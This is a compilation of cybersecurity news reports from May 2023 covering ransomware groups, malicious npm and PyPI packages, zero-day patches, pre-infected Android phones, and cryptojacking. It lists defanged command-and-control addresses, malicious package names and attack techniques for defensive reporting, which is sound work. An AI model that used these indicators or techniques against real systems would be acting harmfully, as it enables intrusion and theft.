The notorious cybercrime group known as FIN7 has been observed deploying Cl0p (aka Clop) ransomware, marking the threat actor's first ransomware campaign since late 2021.
Microsoft, which detected the activity in April 2023, is tracking the financially motivated actor under its new taxonomy Sangria Tempest.
"In these recent attacks, Sangria Tempest uses the PowerShell script POWERTRASH to load the Lizar post-exploitation tool and get a foothold into a target network," the company's threat intelligence team said. "They then use OpenSSH and Impacket to move laterally and deploy Clop ransomware."
FIN7 (aka Carbanak, ELBRUS, and ITG14) has been linked to other ransomware families such as Black Basta, DarkSide, REvil, and LockBit, with the threat actor acting as a precursor for Maze and Ryuk ransomware attacks.
Active since at least 2012, the group has a track record of targeting a broad spectrum of organizations spanning software, consulting, financial services, medical equipment, cloud services, media, food and beverage, transportation, and utilities.
Another notable tactic in its playbook is its pattern of setting up fake security companies Combi Security and Bastion Secure to recruit employees for conducting ransomware attacks and other operations.
Last month, IBM Security X-Force revealed that members of the now-defunct Conti ransomware gang are using a new malware called Domino that's developed by the cybercrime cartel.
FIN7's use of POWERTRASH to deliver Lizar (aka DICELOADER or Tirion) was also highlighted by WithSecure a few weeks ago in connection with attacks exploiting a high-severity flaw in Veeam Backup & Replication software (CVE-2023-27532) to gain initial access.
The latest development signifies FIN7's continued reliance on various ransomware families to target victims as part of a shift in its monetization strategy by pivoting away from payment card data theft to extortion.
Samsung Devices Under Active Exploitation! CISA Warns of Critical Flaw
20.5.23 Vulnerebility The Hacker News
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) warned of active exploitation of a medium-severity flaw affecting Samsung devices.
The issue, tracked as CVE-2023-21492 (CVSS score: 4.4), impacts select Samsung devices running Android versions 11, 12, and 13.
The South Korean electronics giant described the issue as an information disclosure flaw that could be exploited by a privileged attacker to bypass address space layout randomization (ASLR) protections.
ASLR is a security technique that's designed to thwart memory corruption and code execution flaws by obscuring the location of an executable in a device's memory.
Samsung, in an advisory released this month, said it was "notified that an exploit for this issue had existed in the wild," adding it was privately disclosed to the company on January 17, 2023.
Other details about how the flaw is being exploited are currently not known, but vulnerabilities in Samsung phones have been weaponized by commercial spyware vendors in the past to deploy malicious software.
Back in August 2020, Google Project Zero also demonstrated a remote zero-click MMS attack that leveraged two buffer overwrite flaws in the Quram qmg library (SVE-2020-16747 and SVE-2020-17675) to defeat ASLR and achieve code execution.
In light of active abuse, CISA has added the shortcoming to its Known Exploited Vulnerabilities (KEV) catalog, alongside two Cisco IOS flaws (CVE-2004-1464 and CVE-2016-6415), urging Federal Civilian Executive Branch (FCEB) agencies to apply patches by June 9, 2023.
Last week, CISA also added seven vulnerabilities to the KEV catalog, the oldest of which is a 13-year-old bug impacting Linux (CVE-2010-3904) that allows an unprivileged local attacker can escalate their privileges to root.
Developer Alert: NPM Packages for Node.js Hiding Dangerous TurkoRat Malware
19.5.23 Virus The Hacker News
Two malicious packages discovered in the npm package repository have been found to conceal an open source information stealer malware called TurkoRat.
The packages named nodejs-encrypt-agent and nodejs-cookie-proxy-agent were collectively downloaded approximately 1,200 times and were available for more than two months before they were identified and taken down.
ReversingLabs, which broke down the details of the campaign, described TurkoRat as an information stealer capable of harvesting sensitive information such as login credentials, website cookies, and data from cryptocurrency wallets.
While nodejs-encrypt-agent came fitted with the malware inside, nodejs-cookie-proxy-agent was found to disguise the trojan as a dependency under the name axios-proxy.
nodejs-encrypt-agent was also engineered to masquerade as another legitimate npm module known as agent-base, which has been downloaded over 25 million times to date.
The list of the rogue packages and their associated versions are listed below -
nodejs-encrypt-agent (versions 6.0.2, 6.0.3, 6.0.4, and 6.0.5)
nodejs-cookie-proxy-agent (versions 1.1.0, 1.2.0, 1.2.1, 1.2.2, 1.2.3, and 1.2.4), and
axios-proxy (versions 1.7.3, 1.7.4, 1.7.7, 1.7.9, 1.8.9, and 1.9.9)
"TurkoRat is just one of many open source malware families that are offered for 'testing' purposes, but can readily be downloaded and modified for malicious use, as well," Lucija Valentiζ, threat researcher at ReversingLabs, said.
The findings once again underscore the ongoing risk of threat actors orchestrating supply chain attacks via open source packages and baiting developers into downloading potentially untrusted code.
"Development organizations need to scrutinize the features and behaviors of the open source, third-party and commercial code they are relying on in order to track dependencies and detect potential malicious payloads in them," Valentiζ said.
The growing use of malicious npm packages fits in with a broader pattern of surging attacker interest in open source software supply chains, not to mention highlighting the increasing sophistication of threat actors.
Even more worryingly, researchers from Checkmarx published new research this month that showed how threat actors could impersonate authentic npm packages by "using lowercase letters to mimic uppercase letters in the original package names" (e.g., memoryStorageDriver vs memorystoragedriver).
"This malicious package impersonation takes the traditional 'Typosquatting,' attack method to a new level, where attackers register package names that consist of the exact same letters as the legitimate ones, with the only difference being capitalization," researchers Teach Zornstein and Yehuda Gelb said.
"This makes it even harder for users to detect the deception since it can be easy to overlook the subtle differences in capitalization."
The supply chain security company found that 1,900 out of 3,815 packages with capital letters in their titles could have been at risk of copycat attacks if not for a fix pushed by the npm maintainers to address the problem, which, Checkmarx said, has existed since December 2017.
The disclosure also follows another advisory from Check Point, which identified three malicious extensions hosted on the VS Code extensions marketplace. They have been purged as of May 14, 2023.
The add-ons, named prettiest java, Darcula Dark, and python-vscode, were cumulatively downloaded over 46,000 times and incorporated features that allowed the threat actors to steal credentials, system information, and establish a remote shell on the victim's machine.
It's not just npm and VS Code marketplace, for a similar set of rogue libraries have been unearthed from the Python Package Index (PyPI) software repository as well.
Some of these packages were designed to distribute a cryptocurrency clipper malware dubbed KEKW, while other typosquatted versions of the popular flask framework included backdoor functions to receive commands from a remote server.
Another Python package uncovered by Israeli company Phylum this week was found to contain a malicious dependency that harbored an encrypted payload to grab Discord tokens and steal clipboard content in order to hijack cryptocurrency transactions.
The package, referred to as chatgpt-api by its developer Patrick Pogoda and accessible through GitHub, delivered on the functionality it advertised (i.e., interacting with OpenAI's ChatGPT tool) in an attempt to complete the ruse. The repository is still available as of writing.
"For now this actor appears to be preying on the recent explosive rise in popularity of [Large Language Models] with this chatgpt-api package," Phylum said, adding the threat actor likely has an automated mechanism to upload new iterations of the malicious dependency every time it's taken down and "maintain a persistent infection."
Searching for AI Tools? Watch Out for Rogue Sites Distributing RedLine Malware
19.5.23 Virus The Hacker News
Malicious Google Search ads for generative AI services like OpenAI ChatGPT and Midjourney are being used to direct users to sketchy websites as part of a BATLOADER campaign designed to deliver RedLine Stealer malware.
"Both AI services are extremely popular but lack first-party standalone apps (i.e., users interface with ChatGPT via their web interface while Midjourney uses Discord)," eSentire said in an analysis.
"This vacuum has been exploited by threat actors looking to drive AI app-seekers to imposter web pages promoting fake apps."
BATLOADER is a loader malware that's propagated via drive-by downloads where users searching for certain keywords on search engines are displayed bogus ads that, when clicked, redirect them to rogue landing pages hosting malware.
The installer file, per eSentire, is rigged with an executable file (ChatGPT.exe or midjourney.exe) and a PowerShell script (Chat.ps1 or Chat-Ready.ps1) that downloads and loads RedLine Stealer from a remote server.
Once the installation is complete, the binary makes use of Microsoft Edge WebView2 to load chat.openai[.]com or www.midjourney[.]com the legitimate ChatGPT and Midjourney URLs in a pop-up window so as to not raise any red flags.
The adversary's use of ChatGPT and Midjourney-themed lures to serve malicious ads and ultimately drop the RedLine Stealer malware was also highlighted last week by Trend Micro.
This is not the first time the operators behind BATLOADER have capitalized on the AI craze to distribute malware. In March 2023, eSentire detailed a similar set of attacks that leveraged ChatGPT lures to deploy Vidar Stealer and Ursnif.
The cybersecurity company further pointed out the abuse of Google Search ads has fallen off from their early 2023 peak, suggesting that the tech giant is taking active steps to curtail its exploitation.
The findings come weeks after Securonix uncovered a phishing campaign dubbed OCX#HARVESTER that targeted the cryptocurrency sector between December 2022 and March 2023 with More_eggs (aka Golden Chickens), a JavaScript downloader that's used to serve additional payloads.
eSentire, in January, traced the identity of one of the key operators of the malware-as-a-service (MaaS) to an individual located in Montreal, Canada. The second threat actor associated with the group has since been identified as a Romanian national who goes by the alias Jack.
WebKit Under Attack: Apple Issues Emergence Patches for 3 New Zero-Day Vulnerabilities
19.5.23 Apple The Hacker News
Apple on Thursday rolled out security updates to iOS, iPadOS, macOS, tvOS, watchOS, and the Safari web browser to address three new zero-day flaws that it said are being actively exploited in the wild.
The three security shortcomings are listed below -
CVE-2023-32409 - A WebKit flaw that could be exploited by a malicious actor to break out of the Web Content sandbox. It was addressed with improved bounds checks.
CVE-2023-28204 - An out-of-bounds read issue in WebKit that could be abused to disclose sensitive information when processing web content. It was addressed with improved input validation.
CVE-2023-32373 - A use-after free bug in WebKit that could lead to arbitrary code execution when processing maliciously crafted web content. It was addressed with improved memory management.
The iPhone maker credited Clιment Lecigne of Google's Threat Analysis Group (TAG) and Donncha Σ Cearbhaill of Amnesty International's Security Lab for reporting CVE-2023-32409. An anonymous researcher has been acknowledged for reporting the other two issues.
It's worth noting that both CVE-2023-28204 and CVE-2023-32373 were patched as part of Rapid Security Response updates iOS 16.4.1 (a) and iPadOS 16.4.1 (a) the company released at the start of the month.
There are currently no additional technical specifics about the flaws, the nature of the attacks, or the identity of the threat actors that may be exploiting them.
That said, such weaknesses have been historically leveraged as part of highly-targeted intrusions to deploy mercenary spyware on the devices of dissidents, journalists, and human rights activists, among others.
The latest updates are available for the following devices and operating systems -
iOS 16.5 and iPadOS 16.5 - iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later
iOS 15.7.6 and iPadOS 15.7.6 - iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)
macOS Ventura 13.4 - macOS Ventura
tvOS 16.5 - Apple TV 4K (all models) and Apple TV HD
watchOS 9.5 - Apple Watch Series 4 and later
Safari 16.5 - macOS Big Sur and macOS Monterey
Apple has so far remediated a total of six actively exploited zero-days since the start of 2023. Earlier this February, the company plugged a WebKit flaw (CVE-2023-23529) that could lead to remote code execution.
Then last month, it shipped fixes for a pair of vulnerabilities (CVE-2023-28205 and CVE-2023-28206) that allowed for code execution with elevated privileges. Lecigne and Σ Cearbhaill were credited with reporting the security defects.
This Cybercrime Syndicate Pre-Infected Over 8.9 Million Android Phones Worldwide
19.5.23 Android The Hacker News
A cybercrime enterprise known as Lemon Group is leveraging millions of pre-infected Android smartphones worldwide to carry out their malicious operations, posing significant supply chain risks.
"The infection turns these devices into mobile proxies, tools for stealing and selling SMS messages, social media and online messaging accounts and monetization via advertisements and click fraud," cybersecurity firm Trend Micro said.
The activity encompasses no fewer than 8.9 million compromised Android devices, particularly budget phones, with the highest concentration of the infections discovered in the U.S., Mexico, Indonesia, Thailand, Russia, South Africa, India, Angola, the Philippines, and Argentina.
The findings were presented by researchers Fyodor Yarochkin, Zhengyu Dong, Vladimir Kropotov, and Paul Pajares at the Black Hat Asia conference held in Singapore last week.
Describing it as a continuously evolving problem, the cybersecurity firm said the threat actors are branching out to other Android-based IoT devices such as Smart TVs, Android TV boxes, entertainment systems, and even children's watches.
The infections are globally spread across in over 180 countries, with over 50 brands of mobile devices compromised by a malware strain called Guerilla.
"Following our timeline estimates, the threat actor has spread this malware over the last five years," the researchers said. "A compromise on any significant critical infrastructure with this infection can likely yield a significant profit for Lemon Group in the long run at the expense of legitimate users."
Guerilla was first documented by Sophos in 2018 when it discovered 15 apps uploaded on the Play Store that harbored functionality to engage in click fraud and act as a backdoor.
The malware also attracted attention in early 2022 for its ability to intercept SMS messages that match predefined characteristics such as one-time passwords (OTPs) associated with various online platforms, shortly after which the threat actor changed the name of the undertaking from Lemon to Durian Cloud SMS.
The goal, per Trend Micro, is to bypass SMS-based verification and advertise bulk virtual phone numbers which belong to unsuspecting users of the infected Android handsets for sale to create online accounts.
While such services have a privacy benefit, allowing users to sign up for services using temporary or disposable phone numbers, they can also be abused to create spam accounts on a large scale and conduct fraud.
The latest findings from the cybersecurity company illustrate that the SMS grabbing feature is just one of the many plugins associated with a downloader component (aka the main plugin) that's loaded into a zygote process by means of a tampered library.
It's worth noting that the same technique of modifying the zygote process has also been adopted by another mobile trojan called Triada.
"With this, every time other app processes are forked from the zygote, it would also be tampered," the researchers said. "The main plugin will load other plugins with the current process being the target, and the other plugins will try to control the current app via a hook."
Each of the Guerilla plugins serves a particular business function and a monetization opportunity for the Lemon Group actors. Some of them are listed below -
Proxy plugin to setup reverse proxy from an infected phone and allow other actors to rent out access to the network resources of the affected mobile device
Cookie plugin to harvest users' Facebook cookies and other profile information
WhatsApp plugin to hijack sessions and send unwanted messages
Splash plugin to serve unwarranted ads when launching certain apps, and
Silent plugin to stealthily install an APK file and launch the app
Further investigation into the sprawling operation has unraveled infrastructure overlaps Lemon Group and Triada, suggesting that the two groups may have collaborated at some point.
The unauthorized firmware modifications are believed to have occurred via an unnamed third-party vendor that "produces the firmware components for mobile phones" and which also manufactures similar components for Android Auto.
That said, Trend Micro did not reveal the exact modus operandi of how the devices are infected with the trojanized firmware containing Guerilla, how they are sold in the market, and what brands are impacted.
The disclosure comes as Microsoft security researcher Dimitrios Valsamaras detailed a new attack method dubbed Dirty Stream that turns Android share targets into a vector for distributing malicious payloads and capturing sensitive data from other apps installed on a device.
"The concept is similar to a file upload vulnerability of a web application," Valsamaras said. "More specifically, a malicious app uses a specially crafted content provider to bear a payload that it sends to the target application."
"As the sender controls the content but also the name of the stream, the receiver may overwrite critical files with malicious content in case it doesn't perform some necessary security checks. Additionally, when certain conditions apply, the receiver may also be forced to copy protected files to a public directory, setting the user's private data at risk."
Escalating China-Taiwan Tensions Fuel Alarming Surge in Cyber Attacks
19.5.23 BigBrothers The Hacker News
The rising geopolitical tensions between China and Taiwan in recent months have sparked a noticeable uptick in cyber attacks on the East Asian island country.
"From malicious emails and URLs to malware, the strain between China's claim of Taiwan as part of its territory and Taiwan's maintained independence has evolved into a worrying surge in attacks," the Trellix Advanced Research Center said in a new report.
The attacks, which have targeted a variety of sectors in the region, are mainly designed to deliver malware and steal sensitive information, the cybersecurity firm said, adding it detected a four-fold jump in the volume of malicious emails between April 7 and April 10, 2023.
Some of the most impacted industry verticals during the four-day time period were networking, manufacturing, and logistics.
What's more, the spike in malicious emails targeting Taiwan was followed by a 15x increase in PlugX detections between April 10 and April 12, 2023, indicating that the phishing lures acted as an initial access vector to drop additional payloads.
PlugX, a remote access trojan spotted in the wild since 2008, is a Windows backdoor that has been put to use by numerous Chinese threat actors to control victim machines. It's also known for employing DLL side-loading techniques to fly under the radar.
"This technique consists of a legitimate program loading a malicious dynamic link library (DLL) file that masquerades as a legitimate DLL file," Trellix researchers Daksh Kapur and Leandro Velasco said.
"This allows the execution of arbitrary malicious code bypassing security measures that look for malicious code running directly from an executable file."
Besides PlugX, Trellix said it also identified other malware families such as the Kryptik trojan as well as stealers like Zmutzy and FormBook targeting the nation.
That's not all. Some of the socially engineered messages contained links to seemingly innocuous login pages that mimic legitimate brands, including DHL, in an attempt to trick users into entering their credentials.
"In the past few years, we noticed that geopolitical conflicts are one of the main drivers for cyber attacks on a variety of industries and institutions," Joseph Tal, senior vice president of the Trellix Advanced Research Center, said.
"Monitoring geopolitical events can help organizations to predict cyber attacks in countries they operate in."
Escalating China-Taiwan Tensions Fuel Alarming Surge in Cyber Attacks
18.5.23 BigBrothers The Hacker News
The rising geopolitical tensions between China and Taiwan in recent months have sparked a noticeable uptick in cyber attacks on the East Asian island country.
"From malicious emails and URLs to malware, the strain between China's claim of Taiwan as part of its territory and Taiwan's maintained independence has evolved into a worrying surge in attacks," the Trellix Advanced Research Center said in a new report.
The attacks, which have targeted a variety of sectors in the region, are mainly designed to deliver malware and steal sensitive information, the cybersecurity firm said, adding it detected a four-fold jump in the volume of malicious emails between April 7 and April 10, 2023.
Some of the most impacted industry verticals during the four-day time period were networking, manufacturing, and logistics.
What's more, the spike in malicious emails targeting Taiwan has been followed by a 15x increase in PlugX detections between April 10 and April 12, 2023, indicating that the phishing lures acted as an initial access vector to drop additional payloads.
PlugX, a remote access trojan spotted in the wild since 2008, is a Windows backdoor that has been put to use by numerous Chinese threat actors to control victim machines. It's also known for employing DLL side-loading techniques to fly under the radar.
Cyber Attacks
"This technique consists of a legitimate program loading a malicious dynamic link library (DLL) file that masquerades as a legitimate DLL file," Trellix researchers Daksh Kapur and Leandro Velasco said.
"This allows the execution of arbitrary malicious code bypassing security measures that look for malicious code running directly from an executable file."
Besides PlugX, Trellix said it also identified other malware families such as the Kryptik trojan as well as stealers like Zmutzy and FormBook targeting the nation.
"In the past few years, we noticed that geopolitical conflicts are one of the main drivers for cyber attacks on a variety of industries and institutions," Joseph Tal, senior vice president of the Trellix Advanced Research Center, said.
"Monitoring geopolitical events can help organizations to predict cyber attacks in countries they operate in."
8220 Gang Exploiting Oracle WebLogic Flaw to Hijack Servers and Mine Cryptocurrency
18.5.23 Exploit The Hacker News
The notorious cryptojacking group tracked as 8220 Gang has been spotted weaponizing a six-year-old security flaw in Oracle WebLogic servers to ensnare vulnerable instances into a botnet and distribute cryptocurrency mining malware.
The flaw in question is CVE-2017-3506 (CVSS score: 7.4), which, when successfully exploited, could allow an unauthenticated attacker to execute arbitrary commands remotely.
"This allows attackers to gain unauthorized access to sensitive data or compromise the entire system," Trend Micro researcher Sunil Bharti said in a report published this week.
8220 Gang, first documented by Cisco Talos in late 2018, is so named for its original use of port 8220 for command-and-control (C2) network communications.
"8220 Gang identifies targets via scanning for misconfigured or vulnerable hosts on the public internet," SentinelOne noted last year. "8220 Gang is known to make use of SSH brute force attacks post-infection for the purposes of lateral movement inside a compromised network."
Earlier this year, Sydig detailed attacks mounted by the "low-skill" crimeware group between November 2022 and January 2023 that aim to breach vulnerable Oracle WebLogic and Apache web servers and deploy a cryptocurrency miner.
It has also been observed making use of an off-the-shelf malware downloader known as PureCrypter as well as a crypter codenamed ScrubCrypt to conceal the miner payload and evade detection by security software.
In the latest attack chain documented by Trend Micro, the Oracle WebLogic Server vulnerability is leveraged to deliver a PowerShell payload, which is then used to create another obfuscated PowerShell script in memory.
This newly created PowerShell script disables Windows Antimalware Scan Interface (AMSI) detection and launches a Windows binary that subsequently reaches out to a remote server to retrieve a "meticulously obfuscated" payload.
The intermediate DLL file, for its part, is configured to download a cryptocurrency miner from one of the three C2 servers 179.43.155[.]202, work.letmaker[.]top, and su-94.letmaker[.]top using TCP ports 9090, 9091, or 9092.
Trend Micro said recent attacks have also entailed the misuse of a legitimate Linux tool called lwp-download to save arbitrary files on the compromised host.
"lwp-download is a Linux utility present in a number of platforms by default, and 8220 Gang making this a part of any malware routine can affect a number of services even if it were reused more than once," Bharti said.
"Considering the threat actor's tendency to reuse tools for different campaigns and abuse legitimate tools as part of the arsenal, organizations' security teams might be challenged to find other detection and blocking solutions to fend off attacks that abuse this utility."
Darknet Carding Kingpin Pleads Guilty: Sold Financial Info of Tens of Thousands
18.5.23 CyberCrime The Hacker News
A U.S. national has pleaded guilty in a Missouri court to operating a darknet carding site and selling financial information belonging to tens of thousands of victims in the country.
Michael D. Mihalo, aka Dale Michael Mihalo Jr. and ggmccloud1, has been accused of setting up a carding site called Skynet Market that specialized in the trafficking of credit and debit card data.
Mihalo and his associates also peddled their warez on other dark web marketplaces such as AlphaBay Market, Wall Street Market, and Hansa Market between February 22, 2016, and October 1, 2019.
"Mihalo assembled and directed the team that helped him sell this stolen financial information on the darknet," the U.S. Department of Justice (DoJ) said in a press statement released on May 16, 2023.
"Mihalo personally possessed, sent, and received the information associated with 49,084 stolen payment cards with the intent that the payment card information would be trafficked on darknet sites, all in furtherance of the conspiracy."
One of the defendant's accomplices, Taylor Ross Staats, worked as a "card checker," ensuring that the financial information being sold is still valid and had not been canceled by the respective financial institutions.
Staats is estimated to have earned at least $21,000 worth of Bitcoin for these services. He pleaded guilty on December 14, 2022, to one count of conspiracy to commit access device fraud for this role in the operation. He faces a maximum penalty of five years in prison.
Mihalo, a 40-year-old Illinois native, raked in more than $1 million worth of cryptocurrencies from the schemes, the Justice Department added.
The defendant has pleaded guilty to one count of conspiracy to commit access device fraud, which carries a maximum prison term of five years, as well as one count of access device fraud and six counts of money laundering, each of which carry up to 10 years of jail time. He has also been ordered to forfeit all the illicit proceeds.
Earlier this month, U.S. authorities also shut down Try2Check, a popular Russian platform that was used by cybercriminals to confirm the legitimacy of stolen credit card information.
Apple Thwarts $2 Billion in App Store Fraud, Rejects 1.7 Million App Submissions
18.5.23 Apple The Hacker News
Apple has announced that it prevented over $2 billion in potentially fraudulent transactions and rejected roughly 1.7 million app submissions for privacy and security violations in 2022.
The computing giant said it terminated 428,000 developer accounts for potential fraudulent activity, blocked 105,000 fake developer account creations, and deactivated 282 million bogus customer accounts. It further noted that it thwarted 198 million attempted fraudulent new accounts prior to their creation.
In contrast, Apple is estimated to have booted out 802,000 developer accounts in 2021. The company attributed the decline to new App Store "methods and protocols" that prevent the creation of such accounts in the first place.
"In 2022, Apple protected users from nearly 57,000 untrustworthy apps from illegitimate storefronts," the company emphasized. "These unauthorized marketplaces distribute harmful software that can imitate popular apps or alter them without the consent of their developers."
It also touted its App Review process as having been able to flag apps using malicious code designed to steal users' credentials from third-party services as well as those that impersonated legitimate financial management platforms. A total of 6.1 million app submissions were reviewed.
"Over 153,000 app submissions rejected from the App Store last year were found to be spam, copycats, or misleading, and nearly 29,000 submissions were rejected for containing hidden or undocumented features," Apple said. "Upward of 400,000 app submissions were rejected for privacy violations."
On a related note, more than 147 million fraudulent ratings and reviews in the App Store were detected and blocked in 2022, with Apple intercepting close to 3.9 million attempts to install or launch apps distributed illicitly through its Developer Enterprise Program over the past 30 days alone.
Last but not least, Cupertino highlighted that it also blocked nearly 3.9 million stolen credit cards from being used to make fraudulent purchases, and banned 714,000 accounts from transacting again. In all, $2.09 billion in fraudulent transactions on the App Store were blocked in 2022.
The numbers come amid speculations that Apple may soon enable sideloading and allow third-party app stores on iOS devices to comply with the European Union's Digital Markets Act (DMA), which went into effect on November 1, 2022.
The disclosure also arrives close on the heels of a similar report from Google, which said it dismantled 173,000 bad accounts and blocked 1.43 million harmful apps from being published to the Play Store in 2022. It also fended off more than $2 billion in fraudulent and abusive transactions.
Despite these ongoing efforts by Apple and Google, threat actors have found a variety of ways to bypass security protections and publish their apps on the official app stores, often submitting innocuous apps to get past the vetting process and subsequently updating them with malicious functionality.
Earlier this February, app development company Mysk uncovered sketchy two-factor authentication (2FA) apps one of them ranking at number five for "authenticator app" in the US App Store that trick users into subscribing to a weekly or annual plan. Similar scam apps were reported in 2022.
"As bad actors evolve their dishonest tactics and methods of deception, Apple supplements its anti-fraud initiatives with feedback gleaned from a myriad of channels from news stories to social media to AppleCare calls and will continue to develop new approaches and tools designed to prevent fraud from harming App Store users and developers," the company said.
Critical Flaws in Cisco Small Business Switches Could Allow Remote Attacks
18.5.23 Vulnerebility The Hacker News
Cisco has released updates to address a set of nine security flaws in its Small Business Series Switches that could be exploited by an unauthenticated, remote attacker to run arbitrary code or cause a denial-of-service (DoS) condition.
"These vulnerabilities are due to improper validation of requests that are sent to the web interface," Cisco said, crediting an unnamed external researcher for reporting the issues.
Four of the nine vulnerabilities are rated 9.8 out of 10 on the CVSS scoring system, making them critical in nature. The nine flaws affect the following product lines -
250 Series Smart Switches (Fixed in firmware version 2.5.9.16)
350 Series Managed Switches (Fixed in firmware version 2.5.9.16)
350X Series Stackable Managed Switches (Fixed in firmware version 2.5.9.16)
550X Series Stackable Managed Switches (Fixed in firmware version 2.5.9.16)
Business 250 Series Smart Switches (Fixed in firmware version 3.3.0.16)
Business 350 Series Managed Switches (Fixed in firmware version 3.3.0.16)
Small Business 200 Series Smart Switches (Will not be patched)
Small Business 300 Series Managed Switches (Will not be patched)
Small Business 500 Series Stackable Managed Switches (Will not be patched)
A brief description of each of the flaws is as follows -
CVE-2023-20159 (CVSS score: 9.8): Cisco Small Business Series Switches Stack Buffer Overflow Vulnerability
CVE-2023-20160 (CVSS score: 9.8): Cisco Small Business Series Switches Unauthenticated BSS Buffer Overflow Vulnerability
CVE-2023-20161 (CVSS score: 9.8): Cisco Small Business Series Switches Unauthenticated Stack Buffer Overflow Vulnerability
CVE-2023-20189 (CVSS score: 9.8): Cisco Small Business Series Switches Unauthenticated Stack Buffer Overflow Vulnerability
CVE-2023-20024 (CVSS score: 8.6): Cisco Small Business Series Switches Unauthenticated Heap Buffer Overflow Vulnerability
CVE-2023-20156 (CVSS score: 8.6): Cisco Small Business Series Switches Unauthenticated Heap Buffer Overflow Vulnerability
CVE-2023-20157 (CVSS score: 8.6): Cisco Small Business Series Switches Unauthenticated Heap Buffer Overflow Vulnerability
CVE-2023-20158 (CVSS score: 8.6): Cisco Small Business Series Switches Unauthenticated Denial-of-Service Vulnerability
CVE-2023-20162 (CVSS score: 7.5): Cisco Small Business Series Switches Unauthenticated Configuration Reading Vulnerability
Successful exploitation of the aforementioned bugs could permit an unauthenticated, remote attacker to execute arbitrary code with root privileges on an affected device by sending a specially crafted request through the web-based user interface.
Alternatively, they could also be abused to trigger a DoS condition or read unauthorized information on vulnerable systems by means of a malicious request.
Cisco said it does not plan to release firmware updates for Small Business 200 Series Smart Switches, Small Business 300 Series Managed Switches, Small Business 500 Series Stackable Managed Switches as they have entered the end-of-life process.
The networking equipment major also said it's aware of the availability of a proof-of-concept (PoC) exploit code, but noted that it did not observe any evidence of malicious exploitation in the wild.
With Cisco devices becoming a lucrative attack vector for threat actors, users are recommended to move quickly to apply the patches to mitigate potential threats.
OilAlpha: Emerging Houthi-linked Cyber Threat Targets Arabian Android Users
18.5.23 Android The Hacker News
A hacking group dubbed OilAlpha with suspected ties to Yemen's Houthi movement has been linked to a cyber espionage campaign targeting development, humanitarian, media, and non-governmental organizations in the Arabian peninsula.
"OilAlpha used encrypted chat messengers like WhatsApp to launch social engineering attacks against its targets," cybersecurity company Recorded Future said in a technical report published Tuesday.
"It has also used URL link shorteners. Per victimology assessment, it appears a majority of the targeted entities were Arabic-language speakers and operated Android devices."
OilAlpha is the new cryptonym given by Recorded Future to two overlapping clusters previously tracked by the company under the names TAG-41 and TAG-62 since April 2022. TAG-XX (short for Threat Activity Group) is the temporary moniker assigned to emerging threat groups.
The assessment that the adversary is acting in the interest of the Houthi movement is based on the fact that the infrastructure used in the attacks is almost exclusively associated with Public Telecommunication Corporation (PTC), a Yemeni telecom service provider subjected to Houthi's control.
That having said, the persistent use of PTC assets doesn't exclude the possibility of a compromise by an unknown third-party. Recorded Future, however, noted that it did not find any evidence to back up this line of reasoning.
Another factor is the use of malicious Android-based applications to likely surveil delegates associated with Saudi Arabian government-led negotiations. These apps mimicked entities tied to the Saudi Arabian government and a humanitarian organization in the U.A.E.
The attack chains commence with potential targets political representatives, media personalities, and journalists receiving the APK files directly from WhatsApp accounts using Saudi Arabian telephone numbers by masquerading the apps as belonging to UNICEF, NGOs, and other relief organizations.
The apps, for their part, act as a conduit to drop a remote access trojan called SpyNote (aka SpyMax) that comes with a plethora of features to capture sensitive information from infected devices.
"OilAlpha's focus in targeting Android devices is not surprising due to the high saturation of Android devices in the Arabian Peninsula region," Recorded Future said.
The cybersecurity company said it also observed njRAT (aka Bladabindi) samples communicating with command-and-control (C2) servers associated with the group, indicating that it's simultaneously making use of desktop malware in its operations.
"OilAlpha launched its attacks at the behest of a sponsoring entity, namely Yemen's Houthis," it theorized. "OilAlpha could be directly affiliated to its sponsoring entity, or could also be operating like a contracting party."
"While OilAlpha's activity is pro-Houthi, there is insufficient evidence to suggest that Yemeni operatives are responsible for this threat activity. External threat actors like Lebanese or Iraqi Hezbollah, or even Iranian operators supporting the IRGC, may have led this threat activity."
Threat Group UNC3944 Abusing Azure Serial Console for Total VM Takeover
17.5.23 CyberCrime The Hacker News
A financially motivated cyber actor has been observed abusing Microsoft Azure Serial Console on virtual machines (VMs) to install third-party remote management tools within compromised environments.
Google-owned Mandiant attributed the activity to a threat group it tracks under the name UNC3944, which is also known as Roasted 0ktapus and Scattered Spider.
"This method of attack was unique in that it avoided many of the traditional detection methods employed within Azure and provided the attacker with full administrative access to the VM," the threat intelligence firm said.
The emerging adversary, which first came to light in late last year, is known to leverage SIM swapping attacks to breach telecommunications and business process outsourcing (BPO) companies since at least May 2022.
Subsequently, Mandiant also found UNC3944 utilizing a loader named STONESTOP to install a malicious signed driver dubbed POORTRY that's designed to terminate processes associated with security software and delete files as part of a BYOVD attack.
It's currently not known how the threat actor conducts the SIM swaps, although the initial access methodology is suspected to involve the use of SMS phishing messages targeting privileged users to obtain their credentials and then staging a SIM swap to receive the two-factor authentication (2FA) token to a SIM card under their control.
Armed with the elevated access, the threat actor then moves to survey the target network by exploiting Azure VM extensions such as Azure Network Watcher, Azure Windows Guest Agent, VMSnapshot, and Azure Policy guest configuration.
"Once the attacker completes their reconnaissance, they employ the serial console functionality in order to gain an administrative command prompt inside of an Azure VM," Mandiant said, adding it observed UNC3944 making use of PowerShell to deploy legitimate remote administration tools.
Group UNC3944
The development is yet another evidence of attackers taking advantage of living-off-the-land (LotL) techniques to sustain and advance an attack, while simultaneously circumventing detection.
"The novel use of the serial console by attackers is a reminder that these attacks are no longer limited to the operating system layer," Mandiant said.
"Unfortunately, cloud resources are often poorly misunderstood, leading to misconfigurations that can leave these assets vulnerable to attackers. While methods of initial access, lateral movement, and persistence vary from one attacker to another, one thing is clear: Attackers have their eyes on the cloud."
Serious Unpatched Vulnerability Uncovered in Popular Belkin Wemo Smart Plugs
17.5.23 Vulnerebility The Hacker News
The second generation version of Belkin's Wemo Mini Smart Plug has been found to contain a buffer overflow vulnerability that could be weaponized by a threat actor to inject arbitrary commands remotely.
The issue, assigned the identifier CVE-2023-27217, was discovered and reported to Belkin on January 9, 2023, by Israeli IoT security company Sternum, which reverse-engineered the device and gained firmware access.
Wemo Mini Smart Plug V2 (F7C063) offers convenient remote control, allowing users to turn electronic devices on or off using a companion app installed on a smartphone or tablet.
